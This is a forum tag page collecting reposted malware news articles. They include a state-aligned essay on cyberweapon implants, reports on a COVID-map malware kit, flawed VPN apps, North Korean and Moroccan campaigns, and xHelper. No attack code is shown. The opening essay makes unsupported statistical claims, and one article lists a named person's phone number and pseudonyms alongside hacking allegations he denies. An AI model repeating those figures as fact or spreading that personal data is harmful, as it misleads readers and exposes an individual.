Showing results for tags 'malware'.
Found 150 results

  1. Today, one of the top priority dimensions of raising capabilities of cyberoperations is the creation of special hardware and software appliances and information technologies to carry out intelligence-gathering and offensive operations. It involves active development of so-called information weapons, a category that encompasses the whole range of means of attacking the adversary’s information resources. This type of attack mainly affects computer and telecommunications systems, including software, databases, computing and data processing, and also communications networks. Of particular importance is the establishment of dedicated offensive technologies that can be applied covertly against command and control infrastructure in order to disrupt the orderly functioning of their key components, and to seize control over them. Intelligence-gathering cyber tools are intended to collect information about the adversary, including the structure, functioning, and vulnerabilities of its command systems. To achieve that, automated workstations will have malware inserted in order to establish a distributed, remotely controlled, intelligence-gathering network. It may include thousands of computers in government and military facilities in various countries.
The definition of malware includes external or internal programming code possessing various destructive functions, such as:
  • destroying or changing software, destroying or corrupting data after a certain condition is met (“logic bombs”);
  • exceeding the user’s authority in order to copy confidential information or to make such copying possible (“trojan horses”);
  • corrupting protection systems or making it possible to bypass them;
  • intercepting user login credentials through phishing or keystroke logging;
  • intercepting data flowing within distributed systems (monitors, sniffers);
  • concealing one’s presence;
  • self-replication, associating with other software and/or embedding its own fragments into other operating or external memory not originally targeted by the malware;
  • destroying or corrupting software code in operating memory;
  • corruption, blocking, or supplanting of data created by applications and entered into data links or external memory.
Overall, there are three main types of destructive functions that may be performed by malware:
  • preserving or collecting fragments of data created by the user or applications, or uploaded and downloaded data, in external memory (local or remote) on the network or a stand-alone computer, including passwords, keys, and other access credentials and confidential documents in electronic form, or simply general corruption of fragments of sensitive data;
  • changing application algorithms (deliberate action against external or operating memory) in order to change the basic logic of their functioning;
  • imposing a specific work regime or replacing data being recorded with data produced by the malware.
Overall, the use of malware assumes the existence of an internal distribution mechanism to spread it to global or local networks, including the internet, to carry out specific tasks.
These may include:
  • penetrating remote computers to completely or partially seize control;
  • launching its own copies of malware on the infected computer;
  • possible further penetration of all available networks.
Such malware is mainly distributed as files attached to emails and electronic messages, and also through specially placed hyperlinks. This type of attack is distinguished by its scale and high speed of infection. Internet sites engaged in spreading malware increase by a factor of two every year. These sites attract the attention of internet users by posting current informational content: news, analysis, overviews of information technologies, and also commercial and entertainment articles. More than 20% of sites are specifically intended for malware distribution. Other means of using malware include:
  • distributed denial of service (DDOS) attacks by generating intense traffic from false requests, which makes it impossible for actual users to gain access to the network or servers;
  • dissemination of malware through USB memory devices, the most efficient means of doing so;
  • embedding and activating code inserts.
At the same time, many NATO countries have established military units for cyber-operations, and also pursue the development of scientific and technical infrastructure to develop special information technologies for offensive use, including self-multiplying and self-distributing malware, and developing doctrines for their use. Moreover, there is the so-called file-less (packet) malware distributed as network packets and penetrating computers through OS vulnerabilities or security holes in applications. In order to embed malware remotely, one can use social engineering or weaknesses in organizational network administration, such as unprotected local disks. The most widespread means of embedding malware is the Internet. Offensive malware targets both individual computers and networks.
It accomplishes penetration using known and newly discovered weaknesses of both software and hardware developed by the potential adversary, but also in devices and programs developed by the world’s leading IT firms, most of which are based in the US. Other means of embedding malware are: agents, remote technical means including peripheral appliances of the system being attacked, combined attacks, etc. Malware developers focus on the ability to maintain a stealthy presence amidst the target’s software and remain there even after an upgrade or software renewal. Main means of covert embedding of malware include:
  • Pretending to be ordinary software. This approach assumes embedding malware using the process of installing a new application. It may be embedded in graphic or text editors, system utilities, screensavers, etc. Its existence is not concealed after installation.
  • Pretending to be a module for expanding the computing environment. It’s a frequent variation on the previous one, and uses access to the ability to expand environments. For example, for the Microsoft Windows OS such modules may include DLL modules and drivers, potentially containing malware.
  • Malware replacing one or several application modules of the attacked environment. This method consists of choosing one or several modules for replacement with malware-infected modules in order to carry out the intended tasks. Such malware should externally be able to carry out the normal functions of the software thus targeted.
  • Direct association. This method consists of associating malware with executable files of one or several legal programs in the system. This is the simplest method for single-task, single-user systems.
  • Indirect association. It consists of associating malware with the code of a software module loaded into operating memory. In this instance the executable file remains unchanged, which makes malware detection harder.
It’s also necessary to ensure the installable part of the virus is already present in the system. The most potentially useful means of embedding malware, not including through global networks, in order to gain covert access to enemy networks are:
  • IRATEMONK allows embedding of malware in order to conduct surveillance on desktop and portable computers through recording onto the hard-drive BIOS, giving it the ability to implement its code by replacing the MBR. It works on various types of hard drives, including Western Digital, Seagate, Maxtor, and Samsung. It supports FAT, NTFS, EXT3, and UFS file systems, but RAID systems are not supported. After embedding, IRATEMONK launches its payload every time the target computer is turned on.
  • SWAP allows embedding malware for espionage by using the motherboard BIOS and the HPA domain of the hard drive by running the OS launch code. This program allows remote access to various operating systems (Windows, FreeBSD, Linux, Solaris) with various file systems (FAT32, NTFS, EXT2, EXT3, UFS 1.0). Two utilities are used for installation: ARKSTREAM (it spoofs the BIOS) and TWISTEDKILT (it writes the SWAP protocol and the malware payload to the HPA area of the hard drive, and is used mainly against cell phones).
  • COTTONMOUTH is a USB device insert providing a wireless bridge to the target network and also for loading exploits to the target system. It may open a covert channel to send commands and data. A built-in radio transmitter allows it to collaborate with other COTTONMOUTH devices. It’s based on the TRINITY component base, with HOWLERMONKEY used as the transmitter. There’s also a version called MOCCASIN, which is inserted into a USB keyboard’s commutation matrix.
  • FIREWALK is an insert used to passively collect Gigabit Ethernet traffic, and to embed malware into Ethernet packets. It can create a VPN tunnel between the targeted network and the center. It’s possible to establish wireless communications with other HOWLERMONKEY-compatible devices. This insert is similar in execution to COTTONMOUTH. It uses the TRINITY component base, and HOWLERMONKEY as transmitter.
  • NIGHTSTAND is a mobile system for active attacks on Wi-Fi networks, with the target being Windows machines when direct access is not possible. The system is based on a notebook-type portable computer running Linux and equipped with radio communications. External amplifiers and antennas give it a range of up to 13 km.
  • DEITYBOUNCE delivers programming access to Dell PowerEdge servers with the help of the motherboard BIOS and the use of the SMM regime to obtain the ability to launch itself before the system is launched. After set-up, it will run every time the system is switched on.
  • FEEDTROUGH is equipment for installing two types of malware, BANANAGLEE and ZESTYLEAK, used to overcome network firewalls. This method is used when the firewall is launched. The malware’s installation is performed if the operating system is present in the database; otherwise it is installed normally. FEEDTROUGH remains in place when the firewall operating system is updated.
  • CTX4000 is a portable continuous emitter. It is used to obtain data from inserts installed on targeted systems.
  • NIGHTWATCH is a PC-based system, used to process signals from the targeted monitor. Signals may be obtained using data collection systems (inserts in fiberoptic cables) or from a general purpose receiver.
  • HOWLERMONKEY is a short- and medium-range radio transmitter. It is a special radio module for other inserts. It is used to collect data from inserts and to enable remote access to them.
Moreover, there are other methods of embedding malware, through transceivers installed in USB cables or devices, through Wi-Fi, Bluetooth, GSM devices and cables attached to the targeted computer. One of the promising methods of remote malware placement is the unmanned aerial vehicle (UAV). USAF specialists have developed the WASP (Wireless Aerial Surveillance Platform) UAV on the basis of the FMQ-117B aerial target.
Its main mission is reconnaissance cyberoperations. Thanks to its onboard equipment, it may break into detected Wi-Fi networks and intercept cell phone conversations. WASP equipment includes an HD-resolution camera, 11 antennas for various radio communications, a GPS receiver, and an onboard computer running Linux. Its memory contains a malware arsenal to break into wireless networks and a dictionary with 340 thousand words for “brute force” attacks. Obtained data and intercepted conversations are recorded in the onboard computer memory (a solid-state hard drive with 500 GB of memory) and may also be sent using internet channels to a special server using 3G and 4G networks, or the compromised Wi-Fi hot-spots. The UAV’s GPS allows it to operate autonomously along an assigned route, but it needs an operator’s involvement for take-off and landing. Each system costs about $6 thousand, not including the cost of the UAV. Similar efforts are underway by US Army Cyber Command in order to interfere with automated command points at tactical and operational levels. The Sun Eagle tactical reconnaissance UAV is being used to test equipment for remote malware insertion into Wi-Fi and LTE wireless networks. Overall, the United States and NATO are developing various methods and means for remote malware insertion. They include various physical means of data processing and transmission, and also different environments for proliferation. Countering such types of cyber weapons is a difficult and complex task, demanding considerable research efforts and financial expenditures.
  2. Live Coronavirus Map Used to Spread Malware
Cybercriminals constantly latch on to news items that captivate the public’s attention, but usually they do so by sensationalizing the topic or spreading misinformation about it. Recently, however, cybercrooks have started disseminating real-time, accurate information about global infection rates tied to the Coronavirus/COVID-19 pandemic in a bid to infect computers with malicious software.
[Image: A recent snapshot of the Johns Hopkins Coronavirus data map, available at coronavirus.jhu.edu.]
In one scheme, an interactive dashboard of Coronavirus infections and deaths produced by Johns Hopkins University is being used in malicious Web sites (and possibly spam emails) to spread password-stealing malware. Late last month, a member of several Russian language cybercrime forums began selling a digital Coronavirus infection kit that uses the Hopkins interactive map as part of a Java-based malware deployment scheme. The kit costs $200 if the buyer already has a Java code signing certificate, and $700 if the buyer wishes to just use the seller’s certificate.
“It loads [a] fully working online map of Corona Virus infected areas and other data,” the seller explains. “Map is resizable, interactive, and has real time data from World Health Organization and other sources. Users will think that PreLoader is actually a map, so they will open it and will spread it to their friends and it goes viral!”
The sales thread claims the customer’s payload can be bundled with the Java-based map into a filename that most Webmail providers allow in sent messages. The seller claims in a demonstration video that Gmail also allows it, but the video shows Gmail still warns recipients that downloading the specific file type in question (obscured in the video) can be harmful. The seller says the user/victim has to have Java installed for the map and exploit to work, but that it will work even on fully patched versions of Java.
“Loader loads .jar files which has real working interactive Coronavirus realtime data map and a payload (can be a separate loader),” the seller said in the video. “Loader can predownload only map and payload will be loaded after the map is launched to show map faster to users. Or vice versa payload can be predownloaded and launched first.”
It’s unclear how many takers this seller has had, but earlier this week security experts began warning of new malicious Web sites being stood up that used interactive versions of the same map to distract visitors while the sites tried to foist the password-stealing AZORult malware.
As long as this pandemic remains front-page news, malware purveyors will continue to use it as lures to snare the unwary. Keep your guard up, and avoid opening attachments sent unbidden in emails — even if they appear to come from someone you know.
A tip of the hat to @holdsecurity for a heads up about this malware offering.
Source: Live Coronavirus Map Used to Spread Malware (KrebsOnSecurity - Brian Krebs)
  3. Major vulnerabilities found in top free VPN apps on Google Play store
SuperVPN Free VPN Client is one of the most popular free VPN apps you can find on the Google Play store, having gained more than 100 million installs already. But besides being a very popular app, there’s something else you need to know about this free VPN: SuperVPN Free VPN Client is also very dangerous.
You see, our analysis shows that this app has critical vulnerabilities that open it up to dangerous attacks known as man-in-the-middle (MITM) hacks. These vulnerabilities will allow hackers to easily intercept all the communications between the user and the VPN provider, letting the hackers see everything the user is doing.
This is actually quite the opposite of what a VPN is supposed to do. A VPN is supposed to keep your online activities private and secure from all snooping eyes. In fact, a VPN is supposed to be so safe that, even if a hacker could intercept these communications, it would take them longer than the age of the universe to even begin to decrypt the data. But that’s not what SuperVPN has done here.
The implications here are pretty dire. Based on our research, more than 105 million people could right now be having their credit card details stolen, their private photos and videos leaked or sold online, every single minute of their private conversations recorded and sent to a server in a secret location. They could be browsing a fake, malicious website set up by the hacker and aided by these dangerous VPN apps.
But what’s even worse is that this app isn’t alone: of the top VPN apps we analyzed, 10 free VPN apps have similar critical vulnerabilities. If you’ve installed any of these dangerous VPN apps, you should delete them immediately:
[Image: Vulnerable VPN apps on Google Play Store]
About this research
In order to undertake our analysis, we first developed a proof of concept for creating a man-in-the-middle (MITM) attack.
We then looked at the top apps in Google Play that were returned when searching for the keyword “vpn” in January 2019. We first attempted our MITM attack on two top-10 VPNs – SuperVPN and Best Ultimate VPN – and then filtered and tested the remaining apps. We disclosed these vulnerabilities to all 10 affected VPN apps in October 2019 and provided them with enough time to fix these issues. Unfortunately, only one of them, Best Ultimate VPN, answered and ultimately patched their app based on the information we provided within this 90-day period. The others did not respond to our queries. We’ve also reported these vulnerabilities to Google, but so far haven’t heard anything back from them yet.
Key takeaways
  • 10 of the top free VPN apps in the Google Play store have significant vulnerabilities, affecting nearly 120 million users
  • These vulnerabilities allow hackers to easily intercept user communications, including seeing the visited websites and stealing usernames and passwords, photos, videos, and messages
  • 2 apps use hard-coded cryptographic keys, and 10 apps are missing encryption of sensitive data. 2 of these apps suffer from both vulnerabilities.
  • One app was already identified as malware, but never removed from the Play store, gaining 100 million installs in the meantime. In earlier research, we identified this app for potentially manipulating Google Play in order to rank highly and get more installs
  • 4 of the affected apps are located in Hong Kong, Taiwan or mainland China
  • Some apps have their encryption keys hard-coded within the app. This means that, even if the data is encrypted, hackers can easily decrypt this data with the included keys
  • Because of the vulnerabilities, hackers can easily force users to connect to their own malicious VPN servers
Let’s take an in-depth look at one app to show what kind of vulnerabilities we found.
SuperVPN putting 100 million users at risk
SuperVPN is a highly popular Android VPN that was in position 5 for the “vpn” keyword at the time of our analysis. According to Google Play, the app has been downloaded more than 100 million times (in January 2019 it only had 50 million installs):
[Image: SuperVPN app installs]
Just to show you how big of a number that is for any VPN, this is the same number of installs for much more popular apps like Tinder and AliExpress:
[Image: Tinder app installs]
[Image: AliExpress app installs]
What we did
In our tests, we noticed that SuperVPN connects with multiple hosts, with some communications being sent via unsecured HTTP. This communication contained encrypted data. But after more digging, we found that this communication actually contained the key needed to decrypt the information.
What we found
After decrypting the data, we found sensitive information about SuperVPN’s server, its certificates, and the credentials that the VPN server needs for authentication. Once we had this information, we replaced the real SuperVPN server data with our own fake server data.
Who is behind SuperVPN?
SuperVPN and its developer SuperSoftTech have been in our sights before. Our previous research analyzed the few companies secretly behind many VPN products. From that, we know that SuperSoftTech claims to be based in Singapore, but it actually belongs to the independent app publisher Jinrong Zheng, a Chinese national likely based in Beijing. We also discovered that SuperVPN had been called out before in a 2016 Australian research article as being the third-most malware-rigged VPN app. This is only one example of vulnerabilities we found in all 10 apps listed in this article.
A reputation for manipulation
SuperVPN was discussed before in our earlier research on the potential manipulation tactics the top VPNs were using to seemingly rank higher in Google Play results.
In that research, we discovered that the top 10 results for the “vpn” keyword in Google Play were all free VPNs. They were ranking more highly than market leader VPNs, such as NordVPN and ExpressVPN. Our research discovered that these better-ranked apps seemed to be using three easy manipulation techniques to get such high rankings. That means that SuperVPN by SuperSoftTech seems to not only be using manipulation techniques to rank highly in Google Play, but is also dangerously vulnerable. We attempted to contact Mr. Zheng on multiple occasions, but we have not heard back from him.
How MITM hackers penetrate VPN apps
In order to really understand how critical and dangerous these vulnerabilities are, you have to understand a little of how users normally connect to VPNs. The exact process for VPNs can seem a bit complicated, but the connection is pretty simple.
Now, with a hacked VPN connection, there’s a MITM hacker who positioned himself right in the middle of your app and the VPN’s backend server:
And this is the dangerous part: by changing the details, he can now force you to connect to his malicious server instead of the real VPN server. While everything will appear to work normally, and you think that you’re being extra safe and secure, you’re actually being seriously exposed. In total, your personal life is exposed, and it’s only limited by the hacker’s imagination what he can do with all that data.
What this means for your safety
This is a disastrous finding on two levels. In the broader sense, it’s disastrous that any app that participates in user data would have these wide-open vulnerabilities that make it particularly easy for hackers and government agencies to monitor user communications. In a more specific, and more dangerous, sense, it’s disastrous that a VPN would have these vulnerabilities. After all, users are connecting to VPNs in order to increase their privacy and security.
For that reason, they’re more willing to transmit sensitive information on VPN apps than on other apps. For a VPN app to then be so vulnerable is a betrayal of users’ trust and puts them in a worse position than if they hadn’t used any VPN at all.
However, there could be something larger at play here. When looking at these apps together, there seem to be two essential possibilities:
  • These core vulnerabilities are intentional for these free VPN apps. After all, since a successful MITM attack would allow someone the ability to monitor sensitive user data (or reroute users to fake VPN servers) without the user’s knowledge, that’s a useful tool for any surveillance-hungry organization or nation.
  • On the other hand, we should probably not attribute to malice what can be explained by stupidity – or here, laziness. In simple terms, the app developers here are so focused on getting high amounts of users and stuffing their app with ads, that they placed lower priority on the core security features of their apps.
While one possibility may seem worse than another, at some point only the result matters: people using these vulnerable apps are putting their data – and possibly their lives – in danger. Based on that essential fact alone, we highly recommend users avoid these vulnerable VPN apps at all costs.
When looking for an effective VPN, we recommend users do their due diligence. Ask yourself the following questions:
  • Do I know this VPN developer or brand? Do they seem trustworthy?
  • Where is the VPN located? Is it in a privacy-friendly country?
  • For mobile apps, what permissions are they requiring? Do they actually need those permissions to function (such as the camera, GPS, microphone)?
  • Free is great – but can you trust this VPN?
There are a few commendable free VPNs or VPNs with free options from reputable brands. Taking an active role in filtering out the good VPNs from the bad ones will save users a lot of trouble later on.
Source
  4. US government goes all in to expose new malware used by North Korean hackers
The US Pentagon, the FBI, and the Department of Homeland Security on Friday exposed a North Korean hacking operation and provided technical details for seven pieces of malware used in the campaign. The US Cyber National Mission Force, an arm of the Pentagon’s US Cyber Command, said on Twitter that the malware is “currently used for phishing & remote access by [North Korean government] cyber actors to conduct illegal activity, steal funds & evade sanctions.” The tweet linked to a post on VirusTotal, the Alphabet-owned malware repository, that provided cryptographic hashes, file names, and other technical details that can help defenders identify compromises inside the networks they protect.
An accompanying advisory from the DHS’s Cybersecurity and Infrastructure Security Agency said the campaign was the work of Hidden Cobra, the government’s name for a hacking group sponsored by the North Korean Government. Many security researchers in the private sector use other names for the group, including Lazarus and Zinc. Six of the seven malware families were uploaded to VirusTotal on Friday.
They included:
  • Bistromath, a full-featured remote access trojan and implant that performs system surveys, file uploads and downloads, process and command executions, and monitoring of microphones, clipboards, and screens
  • Slickshoes, a “dropper” that loads, but doesn’t actually execute, a “beaconing implant” that can do many of the same things Bistromath does
  • Hotcroissant, a full-featured beaconing implant that also does many of the same things listed above
  • Artfulpie, an “implant that performs downloading and in-memory loading and execution of DLL files from a hardcoded url”
  • Buttetline, another full-featured implant, but this one uses a fake HTTPS scheme with a modified RC4 encryption cipher to remain stealthy
  • Crowdedflounder, a Windows executable that’s designed to unpack and execute a Remote Access Trojan into computer memory
But wait... there’s more
Friday’s advisory from the Cybersecurity and Infrastructure Security Agency also provided additional details for the previously disclosed Hoplight, a family of 20 files that act as a proxy-based backdoor. None of the malware contained forged digital signatures, a technique that’s standard among more advanced hacking operations that makes it easier to bypass endpoint security protections.
Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab, posted an image on Twitter that showed the relationship between the malware detailed on Friday with malicious samples the Moscow-based security firm has identified in other campaigns attributed to Lazarus.
Friday’s joint advisory is part of a relatively new approach by the federal government to publicly identify foreign-based hackers and the campaigns they carry out. Previously, government officials mostly steered clear of attributing specific hacking activities to specific governments.
In 2014, that approach began to change when the FBI publicly concluded that the North Korean government was behind the highly destructive hack of Sony Pictures a year earlier. In 2018, the Department of Justice indicted a North Korean agent for allegedly carrying out the Sony hack and unleashing the WannaCry ransomware worm that shut down computers worldwide in 2017. Last year, the US Treasury sanctioned three North Korean hacking groups widely accused of attacks that targeted critical infrastructure and stole millions of dollars from banks in cryptocurrency exchanges. As Cyberscoop pointed out, Friday marked the first time that the US Cyber Command identified a North Korean hacking operation.
One reason for the change: although the North Korean government hackers often use less advanced malware and techniques than counterparts from other countries, the attacks are growing increasingly sophisticated. News agencies including Reuters have cited a United Nations report from last August that estimated North Korean hacking of banks and cryptocurrency exchanges has generated $2 billion for the country’s weapons of mass destruction programs.
Source
  5. French Firms Rocked by Kasbah Hacker?
A large number of French critical infrastructure firms were hacked as part of an extended malware campaign that appears to have been orchestrated by at least one attacker based in Morocco, KrebsOnSecurity has learned. An individual thought to be involved has earned accolades from the likes of Apple, Dell, and Microsoft for helping to find and fix security vulnerabilities in their products.
In 2018, security intelligence firm HYAS discovered a malware network communicating with systems inside of a French national power company. The malware was identified as a version of the remote access trojan (RAT) known as njRAT, which has been used against millions of targets globally with a focus on victims in the Middle East.
Further investigation revealed the electricity provider was just one of many French critical infrastructure firms that had systems beaconing home to the malware network’s control center. Other victims included one of France’s largest hospital systems; a French automobile manufacturer; a major French bank; companies that work with or manage networks for French postal and transportation systems; a domestic firm that operates a number of airports in France; a state-owned railway company; and multiple nuclear research facilities.
HYAS said it quickly notified the French national computer emergency team and the FBI about its findings, which pointed to a dynamic domain name system (DNS) provider on which the purveyors of this attack campaign relied for their various malware servers. When it didn’t hear from French authorities after almost a week, HYAS asked the dynamic DNS provider to “sinkhole” the malware network’s control servers. Sinkholing is a practice by which researchers assume control over a malware network’s domains, redirecting any traffic flowing to those systems to a server the researchers control.
While sinkholing doesn’t clean up infected systems, it can prevent the attackers from continuing to harvest data from infected PCs or sending them new commands and malware updates. HYAS found that despite its notifications to the French authorities, some of the apparently infected systems were still attempting to contact the sinkholed control networks up until late 2019.
“Due to our remote visibility it is impossible for us to determine if the malware infections have been contained within the [affected] organizations,” HYAS wrote in a report summarizing their findings. “It is possible that an infected computer is beaconing, but is unable to egress to the command and control due to outbound firewall restrictions.”
About the only French critical infrastructure vertical not touched by the Kasbah hackers was the water management sector. HYAS said given the entities compromised — and that only a handful of known compromises occurred outside of France — there’s a strong possibility this was the result of an orchestrated phishing campaign targeting French infrastructure firms. It also concluded the domains associated with this campaign were very likely controlled by a group of adversaries based in Morocco.
“What caught our attention was the nature of the victims and the fact that there were no other observed compromises outside of France,” said Sasha Angus, vice president of intelligence for HYAS. “With the exception of water management, when looking at the organizations involved, each fell within one of the verticals in France’s critical infrastructure strategic plan. While we couldn’t rule out financial crime as the actor’s potential motive, it didn’t appear that the actor leveraged any normal financial crime tools.”
‘FATAL’ ERROR
HYAS said the dynamic DNS provider shared information showing that one of the email addresses used to register a key DNS server for the malware network was tied to a domain for a legitimate business based in Morocco.
According to historic records maintained by Domaintools.com [an advertiser on this site], that email address — [email protected] — was used in 2016 to register the Web site talainine.com, a now-defunct business that offered recreational vehicle-based camping excursions just outside of a city in southern Morocco called Guelmim. Archived copies of talainine.com indicate the business was managed by two individuals, including someone named Yassine Algangaf. A Google search for that name reveals a similarly named individual has been credited by a number of major software companies — including Apple, Dell and Microsoft — with reporting security vulnerabilities in their products. A search on this name at Facebook turned up a page for another now-defunct business called Yamosoft.com that lists Algangaf as an owner. A cached copy of Yamosoft.com at archive.org says it was a Moroccan computer security service that specialized in security audits, computer hacking investigations, penetration testing and source code review. A search on the [email protected] address at 4iq.com — a service that indexes account details like usernames and passwords exposed in Web site data breaches — shows this email address was used to register an account at the computer hacking forum cracked[.]to for a user named “fatal.001.” A LinkedIn profile for a Yassine Algangaf says he’s a penetration tester from the Guelmim province of Morocco. Yet another LinkedIn profile under the same name and location says he is a freelance programmer and penetration tester. Both profiles include the phrase “attack prevention mechanisms researcher security tools proof of concepts developer” in the description of the user’s job experience. 
Searching for this phrase in Google turns up another Facebook page, this time for a “Yassine Majidi,” under the profile name “FatalW01.” A review of Majidi’s Facebook profile shows that phrase as his tag line, and that he has signed several of his posts over the years as “Fatal.001.” There are also two different Skype accounts registered to the ing.equipepro.com email address, one for Yassine Majidi and another for Yassine Algangaf. There is a third Skype account nicknamed “Fatal.001” that is tied to the same phone number included on talainine.com as a contact number for Yassine Algangaf (+212611604438). A video on Majidi’s Facebook page shows him logged in to the “Fatal.001” Skype account. On his Facebook profile, Majidi includes screen shots of several emails from software companies thanking him for reporting vulnerabilities in their products. Fatal.001 was an active member on dev-point[.]com, an Arabic-language computer hacking forum. Throughout multiple posts, Fatal.001 discusses his work in developing spam tools and RAT malware. In this two-hour Arabic language YouTube tutorial from 2014, Fatal.001 explains how to use a RAT he developed called “Little Boy” to steal credit card numbers and passwords from victims. The main control screen for the Little Boy botnet interface includes a map of Morocco. Reached via LinkedIn, Algangaf confirmed he used the pseudonyms Majidi and Fatal.001 for his security research and bug hunting. But he denied ever participating in illegal hacking activities. He acknowledged that [email protected] is his email address, but claims the email account was hacked at some point in 2017. “It has already been hacked and recovered after a certain period,” Algangaf said. “Since I am a security researcher, I publish from time to time a set of blogs aimed at raising awareness of potential security risks.” As for the notion that he has somehow been developing hacking programs for years, Algangaf says this, also, is untrue. 
He said he never sold any copies of the Little Boy botnet, and that this was one of several tools he created for raising awareness. “In 2013, I developed a platform for security research through which penetration test can be done for phones and computers,” Algangaf said. “It contained concepts that could benefit from a controlled domain. As for the fact that unlawful attacks were carried out on others, it is impossible because I simply have no interest in blackhat [activities].” Source: French Firms Rocked by Kasbah Hacker? (KrebsOnSecurity - Brian Krebs)
  6. Nasty Android malware reinfects its targets, and no one knows how

Users report that xHelper is so resilient it survives factory resets.

A widely circulating piece of Android malware primarily targeting US-based phones used a clever trick to reinfect one of its targets in a feat that stumped researchers as to precisely how it was pulled off.

xHelper came to light last May when a researcher from security firm Malwarebytes published this brief profile. Three months later, Malwarebytes provided a deeper analysis after the company’s Android antivirus app detected xHelper on 33,000 devices mostly located in the US, making the malware one of the top Android threats. The encryption and heavy obfuscation made analysis hard, but Malwarebytes researchers ultimately concluded that the main purpose of the malware was to act as a backdoor that could remotely receive commands and install other apps.

On Wednesday, Malwarebytes published a new post that recounted the lengths one Android user took to rid her device of the malicious app. In short, every time she removed two xHelper variants from the device, the malware would reappear on her device within the hour. She reported that even performing a factory reset wasn't enough to make the malware go away.

Blind alleys

Company researchers initially suspected that pre-installed malware was the culprit. They eventually dropped that theory after the user performed a technique that prevented system apps from running. Malwarebytes analysts later saw the malware indicating that Google Play was the source of the reinfections, but they ruled out this possibility after further investigation.

Eventually (and with the help of the Android user), company researchers finally identified the source of the reinfections: several folders on the phone that contained files that, when executed, installed xHelper. All of the folders began with the string com.mufc. To the researchers’ surprise, these folders weren’t removed even though the user performed a factory reset on the device.

“This is by far the nastiest infection I have encountered as a mobile malware researcher,” Malwarebytes’ Nathan Collier wrote in Wednesday’s post. “Usually a factory reset, which is the last option, resolves even the worst infection. I cannot recall a time that an infection persisted after a factory reset unless the device came with pre-installed malware.”

Hidden inside a directory named com.mufc.umbtts was an Android application package, or APK, that dropped an xHelper variant. The variant, in turn, dropped more malware within seconds. And with that, xHelper once again menaced the user’s device.

The user finally rid her device of the malware after using an Android file manager to delete the mufc folders and all their contents. Because the malware was somehow identifying Google Play as the source of the reinfection, Collier recommends people in a similar position disable the Google Play Store app before removing the folders.

Collier still isn’t sure how the mufc folders came to reside on the phone in the first place or why they weren’t deleted during factory reset. In October, security firm Symantec also reported that users were complaining that factory resets didn’t kill xHelper, but company researchers were also unable to explain why. One theory, Collier said, is that an xHelper variant installed the folders and made them appear as an SD card that wasn’t affected by the factory reset (the user reported that her device didn’t have an SD card).

“I was under the assumption that files/directories were removed after a factory reset, but this proves that some things can be left over,” Collier wrote in an email. “There are still a lot of unknowns with this one. We’re just glad to have a resolution for our customers who may be struggling with this infection.”

Source: Nasty Android malware reinfects its targets, and no one knows how (Ars Technica)
  7. Gmail Is Catching More Malicious Attachments With Deep Learning

Users of Gmail get 300 billion attachments each week. To separate legitimate documents from harmful ones, Google turned to AI—and it’s working.

Distributing malware by attaching tainted documents to emails is one of the oldest tricks in the book. It's not just a theoretical risk—real attackers use malicious documents to infect targets all the time. So on top of its anti-spam and anti-phishing efforts, Gmail expanded its malware detection capabilities at the end of last year to include more tailored document monitoring. Good news: it's working.

At the RSA security conference in San Francisco on Tuesday, Google's security and anti-abuse research lead Elie Bursztein will present findings on how the new deep-learning scanner for documents is faring against the 300 billion attachments it has to process each week. It's challenging to tell the difference between legitimate documents in all their infinite variations and those that have specifically been manipulated to conceal something dangerous. Google says that 63 percent of the malicious documents it blocks each day are different than the ones its systems flagged the day before. But this is exactly the type of pattern-recognition problem where deep learning can be helpful.

Currently 56 percent of malware threats against Gmail users come from Microsoft Office documents, and 2 percent come from PDFs. In the months that it's been active, the new scanner has increased its daily malicious Office document detection by 10 percent.

"Ten percent matters," Bursztein told WIRED. "We're trying to close the gap as much as possible. We want to keep adding machine learning everywhere we can, where it makes sense. Machine learning does amazing things sometimes, but sometimes it’s overhyped. We try to use it as an extra layer rather than the only layer. We think that works way better."

The document analyzer looks for common red flags, probes files if they have components that may have been purposefully obfuscated, and does other checks like examining macros—the tool in Microsoft Word documents that chains commands together in a series and is often used in attacks. The volume of malicious documents that attackers send out varies widely day to day. Bursztein says that since its deployment, the document scanner has been particularly good at flagging suspicious documents sent in bursts by malicious botnets or through other mass distribution methods. He was also surprised to discover how effective the scanner is at analyzing Microsoft Excel documents, a complicated file format that can be difficult to assess.

Though a 10 percent detection increase may not sound like a lot, it's a massive improvement at the scale Google is working on, and any gains are productive given that the threat of malicious documents is a real concern around the world. Bursztein says that companies and nonprofits are three times more likely to be targeted by malicious documents than other organizations, and that government entities are five times more likely. Some industries are more likely than others to be targeted, as well. Transportation and critical infrastructure utilities, for example, have a much higher risk than the education sector.

The prevalence of malicious document attacks varies around the world, but for attackers the approach is always an option. Bursztein points out that kits for crafting malicious documents and tailoring them to evade antivirus scanners are readily available in online criminal forums, ranging in price from about $400 to $5,000.

While the scanner is catching more malicious documents than ever, Bursztein and his colleagues will continue to refine it in the hopes of blocking an even bigger chunk of the malware sent to Gmail accounts worldwide. "Malware is something we did after spam and phishing, because malware is a bit harder," he says. "We don't have the malware itself in an email; the documents are all we have at that point. But we always want to improve our detection capabilities and with malicious documents we chose the one where we could make the most impact for our users."

When a full-blown hack is just a rogue Word document download away, users will take whatever extra protections they can get.

Source: Gmail Is Catching More Malicious Attachments With Deep Learning (Wired)
  8. These Crappy Android Cleaner Apps Are Actually Malware

While the latest Android malware you should look out for hasn’t been as popular as the scammy apps that recently drove 382+ million downloads, it’s plenty serious. Security researchers from Trend Micro recently called out a number of Android apps—with more than 470,000 total downloads combined—for being bogus system-cleaning utilities that actually had the potential to install more than 3,000 other malware apps on a user’s device. Worse, these shitty apps could also log into these other shitty apps using your Facebook or Google credentials to help perpetuate advertising fraud (and likely get the malware’s creators a decent payout, until caught).

As Trend Micro describes:

"Based on our analysis, the 3,000 malware variants or malicious payloads (detected by Trend Micro as AndroidOS_BoostClicker.HRX) that can be possibly downloaded to an affected device with this campaign pretend to be system applications that do not show app icons on the device launcher or application list. The cybercriminals behind this campaign can use the affected device to post fake positive reviews in favor of the malicious apps, as well as perform multiple ad fraud techniques by clicking on the ads that pop up."

Though odds are good that you haven’t been infected by the original apps or the malware they dump on your device, here’s a quick list of the apps you’d want to look out for (just in case):

• Shoot Clean-Junk Cleaner,Phone Booster,CPU Cooler
• Super Clean Lite- Booster, Clean&CPU Cooler
• Super Clean-Phone Booster,Junk Cleaner&CPU Cooler
• Quick Games-H5 Game Center
• Rocket Cleaner
• Rocket Cleaner Lite
• Speed Clean-Phone Booster,Junk Cleaner&App Manager
• LinkWorldVPN
• H5 gamebox

